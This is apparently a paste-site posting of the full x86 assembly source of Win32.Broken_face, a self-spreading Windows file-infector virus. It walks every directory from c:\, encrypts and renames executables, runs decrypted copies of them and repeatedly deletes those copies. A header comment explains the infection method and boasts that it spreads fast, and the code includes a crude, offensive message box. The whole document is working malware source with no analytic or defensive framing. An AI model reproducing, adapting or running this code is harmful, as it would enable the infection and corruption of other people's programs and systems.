FlyFar

Win32.Broken_face - Virus Source Code

Mar 9th, 2023
  1. ;                           ___________________
  2. ;                          | Win32.Broken_face |
  3. ;                          | __________________|
  4. ;               ___________||
  5. ;[ Information ]
  6. ;First, virus moves to the root directory, and scans for
  7. ;directories. It enters them and checks for executables. If
  8. ;no files found or more files needed, then looks  in the
  9. ;current directory for another subdir. If there isn't any,
  10. ;it goes back and enters  another dir etc  etc. Encrypts
  11. ;hostfiles ( marked with _ in front of  their name ) and
  12. ;when its time to execute a host, it decrypts it  into a
  13. ;file marked with $, executes it, and keeps  deleting it
  14. ;until  the file exits so the decrypted file disappears.
  15. ;Sick method, could not  think of  anything else, but it
  16. ;works  fine. Infected  hosts keep  the original size if
  17. ;they are smaller than 8192 bytes. That's all. Be careful
  18. ;if you think of experimenting with it,spreads faaassst.
  19.  
  20. .386
  21. .model flat
  22. .data
  23. fuck dd 0
  24. shit dd 0
  25. ftel dd ?
  26. tdata db 318 dup (?)
  27. target dd ?
  28. Nbytes dd 0
  29. newhandle dd ?
  30. depth db 0
  31. filehandle db 40 dup (?)
  32. find_data db 3180 dup (?)
  33. xdata db 318 dup (?)
  34. files2eat db 0eh  
  35. xhandle dd 0
  36. msg db "There was this boy",0dh,"who had two chlidren",0dh
  37. db "with his sisters",0dh,"They were his daughters",0dh
  38. db "They were his favourite lovers",0dh,"I got no lips,I got no tounge"
  39. db 0dh,"Where there were eyes there's only space",0dh
  40. db "I got no lips, I got no tounge",0dh,"I GOT A BROKEN FACE!",0
  41. .code
  42. extrn ExitProcess:proc
  43. extrn MessageBoxA:proc
  44. extrn FindFirstFileA:proc
  45. extrn FindNextFileA:proc
  46. extrn SetCurrentDirectoryA:proc
  47. extrn DeleteFileA:proc
  48. extrn FindClose:proc
  49. extrn CreateFileA:proc
  50. extrn GetCurrentDirectoryA:proc
  51. extrn ReadFile:proc
  52. extrn WriteFile:proc
  53. extrn CloseHandle:proc
  54. extrn WinExec:proc
  55. extrn GetCommandLineA:proc
  56. extrn CreateProcessA:proc
  57.  
  58. start:
  59. sub esp,1024
  60. mov ebp,esp
  61. call GetCommandLineA
  62. inc eax
  63. mov [ftel],eax
  64. laos:
  65. cmp byte ptr [eax],'"'
  66. je monday
  67. inc eax
  68. jmp laos
  69. monday:
  70. mov byte ptr [eax],0
  71. mov dword ptr [fuck],eax
  72. push offset root
  73. call SetCurrentDirectoryA
  74. xor esi,esi    ;for find_data
  75. xor edi,edi    ;for filehandle
  76.  
  77. find1stdir:
  78. lea eax,[find_data+esi]
  79. push eax
  80. push offset dirmasker
  81. call FindFirstFileA
  82. mov dword ptr [filehandle+edi],eax
  83. cmp dword ptr [find_data+esi],10h ;check if it is a dir
  84. jne find2nddir
  85. cmp byte ptr [find_data+esi+44],"."
  86. je find2nddir
  87. getin:
  88. lea eax,[find_data+44+esi]
  89. push eax
  90. call SetCurrentDirectoryA
  91. inc byte ptr [depth]
  92. push offset xdata
  93. push offset exefile
  94. call FindFirstFileA
  95. cmp eax,-1
  96. jnz fne1
  97.  
  98. dam:
  99. add edi,4
  100. add esi,313
  101. jmp find1stdir
  102. fne1:
  103. mov bh,byte ptr [xdata+43]
  104. mov [xhandle],eax
  105. jmp infect
  106. fne2:
  107. mov byte ptr [xdata+43],bh
  108. push offset xdata
  109. mov eax,[xhandle]
  110. push eax
  111. call FindNextFileA
  112. or eax,eax
  113. jz dam
  114.  
  115. infect:
  116. cmp byte ptr [xdata+44],'_'
  117. je fne2
  118.  
  119. mov bh,byte ptr [xdata+43]
  120. mov byte ptr [xdata+43],'_'
  121. push offset tdata
  122. push offset xdata+43
  123. call FindFirstFileA
  124. cmp eax,-1
  125. jnz fne2
  126.  
  127. dmf:
  128. xor edx,edx
  129. push edx
  130. push 2                      
  131. push 1                      
  132. push edx                    
  133. push edx                    
  134. push 40000000h              
  135. push offset xdata+43
  136. call CreateFileA
  137. cmp eax,-1    
  138. je end         ; failed. back in the box :(
  139. mov [newhandle],eax
  140.  
  141. xor edx,edx
  142. push edx
  143. push edx
  144. push 3
  145. push edx
  146. push edx
  147. push 80000000h
  148. push offset xdata+44
  149. call CreateFileA
  150. mov [target],eax
  151. mov byte ptr [shit],66
  152. call copyfile
  153. call ftopen
  154. xor edx,edx
  155. push edx
  156. push 80
  157. push 3
  158. push edx
  159. push edx
  160. push 40000000h
  161. push offset xdata+44
  162. call CreateFileA
  163. mov [newhandle], eax
  164. call copyfile
  165. jmp end
  166. getback:
  167. cmp byte ptr [depth],0
  168. je realend
  169. dec byte ptr [depth]
  170. push dword ptr [edi+filehandle]
  171. call FindClose
  172. sub esi,313
  173. sub edi,4
  174. push offset cdback
  175. call SetCurrentDirectoryA
  176. jmp find2nddir
  177.  
  178. goroot:
  179. xor esi,esi
  180. mov edi,esi
  181. mov byte ptr [depth],0
  182. push offset root
  183. call SetCurrentDirectoryA ;move to c:\
  184.  
  185. find2nddir:
  186. lea eax,[find_data+esi]
  187. push eax
  188. push dword ptr [filehandle+edi]
  189. call FindNextFileA
  190. or eax,eax
  191. jz getback
  192. cmp dword ptr [find_data+esi],10h
  193. jne find2nddir
  194. cmp byte ptr [find_data+esi+44],'.'
  195. je find2nddir
  196. jmp getin
  197.  
  198. end:
  199. dec byte ptr [files2eat]
  200. cmp byte ptr [files2eat],0
  201. jne fne2
  202. realend:
  203. call dencrypt
  204.  
  205. push 5
  206. push dword ptr [ftel]
  207. call WinExec
  208.  
  209. cmp eax,31
  210. jg fuckup
  211.  
  212. push 0
  213. push offset tag+1
  214. push offset msg
  215. push 0
  216. call MessageBoxA
  217. jmp deadend
  218. fuckup:
  219. push dword ptr [ftel]
  220. call DeleteFileA
  221. or eax,eax
  222. jz fuckup
  223.  
  224. deadend:
  225. push 0
  226. call ExitProcess
  227.  
  228. exefile db '*.exe',0
  229. dirmasker db '*.',0
  230. root db 'c:\',0
  231. cdback db '..',0
  232. tag db '[Broken_face',0,'coded by SuperMovah/MISP]'
  233.  
  234. copyfile:
  235. push 0
  236. push offset Nbytes
  237. push 1024
  238. push ebp
  239. mov eax,[target]
  240. push eax
  241. call ReadFile
  242. mov eax,[Nbytes]
  243. or eax,eax
  244. jz gbgb
  245.  
  246. cmp byte ptr [shit],66
  247. je enchost
  248.  
  249. bck:
  250. push 0
  251. push offset Nbytes
  252. push [Nbytes]
  253. push ebp
  254. mov eax,[newhandle]
  255. push eax
  256. call WriteFile
  257. jmp copyfile
  258.  
  259. gbgb:
  260. push dword ptr [newhandle]
  261. call CloseHandle
  262. push dword ptr [target]
  263. call CloseHandle
  264. mov byte ptr [shit],0
  265. ret
  266.  
  267. enchost:
  268. push esi
  269. mov esi,ebp
  270. mov ecx,100h
  271. xor bx,bx
  272. ench:
  273. add bx,cx
  274. xor word ptr [esi],bx
  275. inc esi
  276. inc esi
  277. loop ench
  278. pop esi
  279.  
  280. mov byte ptr [shit],66
  281. jmp bck
  282.  
  283. dencrypt:
  284. mov esi,dword ptr [fuck]
  285. Tuesday:
  286. cmp byte ptr [esi],'\'
  287. je google
  288. dec esi
  289. loop Tuesday
  290. google:
  291. inc esi
  292. mov al,byte ptr [esi]
  293. mov byte ptr [esi],'_'
  294.  
  295. Friday:
  296. inc esi
  297. mov bl,byte ptr [esi]
  298. mov byte ptr [esi],al
  299. cmp byte ptr [esi],0
  300. jz Sunday
  301. inc esi
  302. mov al,byte ptr [esi]
  303. mov byte ptr [esi],bl
  304. cmp byte ptr [esi],0
  305. jnz Friday
  306. Sunday:
  307. call ftopen
  308.  
  309. mov esi, dword ptr [ftel]
  310. ghho:
  311. inc esi
  312. cmp byte ptr [esi],'_'
  313. jne ghho
  314. mov byte ptr [esi],'$'
  315. xor edx,edx
  316. push edx
  317. push 2
  318. push 1
  319. push edx
  320. push 1
  321. push 40000000h
  322. push dword ptr [ftel]
  323. call CreateFileA
  324. mov [newhandle], eax
  325. mov byte ptr [shit],66
  326. call copyfile
  327. ret
  328.  
  329. ftopen:
  330. xor edx,edx
  331. push edx
  332. push edx
  333. push 3
  334. push edx
  335. push 1
  336. push 80000000h
  337. push dword ptr [ftel]
  338. call CreateFileA
  339. mov [target],eax
  340. ret
  341. end start
  342. ;2-9-2004